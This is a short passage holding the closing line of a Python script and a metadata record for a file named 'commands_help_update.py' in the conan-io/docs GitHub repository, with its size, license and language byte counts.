the_file.close()
|
{
"content_hash": "f618f9f7c0fee273302b13495d393ef7",
"timestamp": "",
"source": "github",
"line_count": 134,
"max_line_length": 99,
"avg_line_length": 26.395522388059703,
"alnum_prop": 0.5620582414475545,
"repo_name": "conan-io/docs",
"id": "4cf63c196319f76019bf36fb01ab21126f570e07",
"size": "3537",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "commands_help_update.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "7513"
},
{
"name": "CSS",
"bytes": "3659"
},
{
"name": "Dockerfile",
"bytes": "104"
},
{
"name": "HTML",
"bytes": "25046"
},
{
"name": "JavaScript",
"bytes": "8482"
},
{
"name": "Makefile",
"bytes": "7885"
},
{
"name": "Python",
"bytes": "21553"
},
{
"name": "Shell",
"bytes": "40"
}
],
"symlink_target": ""
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.